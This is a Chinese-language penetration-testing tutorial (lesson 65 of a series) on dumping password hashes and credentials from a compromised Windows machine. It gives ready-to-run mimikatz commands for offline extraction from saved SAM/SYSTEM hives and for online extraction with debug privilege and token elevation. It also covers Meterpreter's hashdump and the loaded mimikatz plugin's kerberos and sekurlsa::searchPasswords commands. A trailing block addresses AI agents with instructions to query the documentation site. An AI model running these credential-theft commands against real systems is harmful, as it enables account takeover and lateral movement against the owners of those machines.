# 第六十五课：离线提取目标机hash补充

上一季下载sys.hiv,sam.hiv,security.hiv文件后，以Linux下为背景来离线提取hash，本季补充以windows为背景离线提取hash。

mimikatz 2.0 二进制文件下载地址：\
<https://github.com/gentilkiwi/mimikatz/releases/latest>\
切到当下目录（注意X86,X64位）

mimikatz离线导hash命令：

```bash
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit
```

![](/files/-LZP8bqs_B9W6XM38oPm)

mimikatz在线导hash命令：

```bash
mimikatz.exe "log Micropoor.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
```

![](/files/-LZP8bqw9frhRzRX5_CA)

当然关于提取目标机的hash，msf也内置了离线提取与在线提取hash。

meterpreter下hashdump命令来提取hash（注意当前权限）\
![](/files/-LZP8br0fyDbR4wzKSAZ)

![](/files/-LZP8br3vCFfBTm_fZ8U)

msf同时也内置了mimikatz，meterpreter执行load mimikatz即可加载该插件。**（这里一定要注意，msf默认调用于payload位数相同的mimikatz）**

![](/files/-LZP8br6RmxiRkrbgt__)

直接执行kerberos即可。

![](/files/-LZP8br9qHgLw_1xcwiG)

当然有些情况下，payload位数无误，权限无误，依然无法提取目标机的密码相关。需要调用mimikatz自定义命令：

```bash
mimikatz_command -f sekurlsa::searchPasswords
```

![](/files/-LZP8brCO7Pqj8pg5dFi)

> Micropoor


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://micro8.gitbook.io/micro8/contents-1/61-70/65-li-xian-ti-qu-mu-biao-ji-hash-bu-chong.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.